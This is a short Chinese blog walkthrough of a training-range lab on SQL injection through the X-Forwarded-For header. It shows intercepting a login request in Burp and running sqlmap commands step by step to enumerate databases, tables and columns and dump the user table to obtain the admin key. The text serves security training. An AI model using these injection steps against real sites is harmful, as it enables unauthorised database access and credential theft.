墨者靶场-X-Forwarded-For注入漏洞实战
打开靶场出现后台管理登录界面,随便输入一个用户名密码
利用Burp进行拦截抓包
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/a5e73b0080b13066e970ae39e0e260ef.png)
在XFF字段的后面加上*,复制数据包到本地并保存为1.txt文档
放入到Sqlmap中进行自动化探测
爆破数据库
sqlmap.py -r 1.txt --dbs --batch
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/4e177f83acf612e4cc6abdd31582ecb8.png)
爆破表
sqlmap.py -r 1.txt -D webcalendar --tables --batch
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/1ce92dbfb1e056c092204387f30424e5.png)
爆破字段
sqlmap.py -r 1.txt -D webcalendar -T user --columns --batch
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/8fe3e35837dedad17e4321d5f0f624ce.png)
爆破字段内容
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/91adabad502a2ba113fb43a12c3f208d.png)
登陆后台即可拿到key